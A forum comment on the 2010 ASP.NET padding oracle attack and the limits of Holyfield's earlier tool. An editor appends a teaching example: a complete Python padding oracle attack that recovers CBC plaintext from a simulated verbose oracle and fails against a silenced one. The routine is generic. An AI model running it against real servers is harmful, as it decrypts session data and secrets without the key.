by storm
5750 days ago
Brian Holyfield claims to have been doing it for a bit (http://www.gdssecurity.com/l/b/2010/09/14/automated-padding-...), although his approach seems to have relied upon default error emissions and is defeated by the common customErrors=on configuration. It doesn't sound like today's attacks have such limitations. And it isn't clear what actual effective workarounds exist, if any. Even in cases where app logic will trip this approach up early (making hard assumptions about session vals having been initialized post-login and consequently failing fast, etc), the secrets are still captured.
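Worked example added by the editor; it is not part of storm's comment, Holyfield's tool, or the ASP.NET research the thread is about. It shows the mechanics being discussed: a CBC padding oracle that leaks "padding valid / invalid" lets an attacker with only the ciphertext recover the plaintext one byte at a time, and an oracle that reports every failure identically (a constant-response stand-in for customErrors=on) gives the byte-by-byte loop nothing to key on. Assumptions: a toy SHA-256 Feistel network stands in for AES (the attack only needs CBC and PKCS#7, not a particular cipher); KEY, MESSAGE and the oracle functions are constructed for the demo; the "silenced" oracle models only the error-message channel, not timing or other side channels.

```python
import hashlib
import os

BLOCK = 16

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Toy 4-round Feistel block cipher keyed with SHA-256 (assumption: stands in
# for AES; the attack below never relies on cipher internals).
def _f(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, xor(left, _f(key, rnd, right))
    return left + right

def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _f(key, rnd, left)), left
    return left + right

def pkcs7_unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, plaintext):
    n = BLOCK - len(plaintext) % BLOCK
    padded = plaintext + bytes([n]) * n
    prev = os.urandom(BLOCK)            # IV travels in the clear as block 0
    out = prev
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, ciphertext):
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))
    return pkcs7_unpad(plain)

def make_oracle(key, silenced=False):
    """Server-side decrypt path (constructed model).
    verbose: a padding failure is distinguishable from success, the
             default-error behaviour the comment refers to.
    silenced: every outcome is reported the same way, so the caller
             learns nothing from the response body (customErrors=on style)."""
    def verbose(ciphertext):
        try:
            cbc_decrypt(key, ciphertext)
            return True
        except ValueError:
            return False
    def silent(ciphertext):
        verbose(ciphertext)
        return False
    return silent if silenced else verbose

def recover_block(oracle, prev, cur):
    """Recover plaintext of `cur` from the oracle alone; None if no signal."""
    inter = bytearray(BLOCK)        # block_decrypt(key, cur), found right to left
    for j in range(BLOCK - 1, -1, -1):
        pad = BLOCK - j
        forged = bytearray(BLOCK)   # plays the role of the previous block
        for k in range(j + 1, BLOCK):
            forged[k] = inter[k] ^ pad      # force known bytes to equal `pad`
        for guess in range(256):
            forged[j] = guess
            if not oracle(bytes(forged) + cur):
                continue
            if j == BLOCK - 1:
                # Last byte can hit on \x02\x02 etc. instead of \x01: disturb the
                # byte to its left; genuine \x01 padding still validates.
                forged[j - 1] ^= 0xFF
                survived = oracle(bytes(forged) + cur)
                forged[j - 1] ^= 0xFF
                if not survived:
                    continue
            inter[j] = guess ^ pad
            break
        else:
            return None
    return xor(bytes(inter), prev)

def padding_oracle_attack(oracle, ciphertext):
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b""
    for prev, cur in zip(blocks, blocks[1:]):
        block = recover_block(oracle, prev, cur)
        if block is None:
            return None
        plain += block
    return pkcs7_unpad(plain)

# Constructed demo data: the attacker sees CIPHERTEXT, never KEY.
KEY = b"constructed-demo-key"
MESSAGE = b"session=42;role=user;secret=hunter2"
CIPHERTEXT = cbc_encrypt(KEY, MESSAGE)

if __name__ == "__main__":
    print(padding_oracle_attack(make_oracle(KEY), CIPHERTEXT))
    print(padding_oracle_attack(make_oracle(KEY, silenced=True), CIPHERTEXT))
```

The verbose oracle gives up the whole message in at most 256 queries per byte, with no knowledge of the key and no need for the application to ever use the decrypted value. The silenced oracle is only a model of the error-message channel: the attack loop returns None because nothing distinguishes a good guess from a bad one, which is the limitation the comment attributes to Holyfield's tool and notes the newer attacks do not share, since they lean on other differences in server behaviour.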